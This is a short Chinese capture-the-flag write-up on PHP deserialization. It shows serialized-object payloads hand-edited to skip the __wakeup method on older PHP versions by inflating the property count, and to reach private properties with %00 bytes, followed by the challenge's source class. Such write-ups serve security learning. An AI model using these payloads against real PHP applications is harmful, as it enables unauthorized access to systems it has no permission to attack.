反序列化 私有属性 绕过__wakeup__
反序列化 私有属性 绕过__wakeup__
1 生成序列化payload的代码
<?php
class Name{
public $username = 'admin';
public $password = 100;
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$n=new Name('admin',100);
echo serialize($n);
?>
2 手工修改payload
2.1 原始序列化的类
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
2.2 将属性的数量设置为大于真实属性数,可以绕过wakeup函数,PHP5 < 5.6.25,PHP7 < 7.0.10
O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
2.3 原始序列化的类,私有属性会在类名和属性名前加%00,复制时会丢失,所以该处手工加上
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
2.4 发送payload
3 原始题目类代码
<?php
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
echo 66666;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
A lion doesn't concern himself with the opinions of a sheep.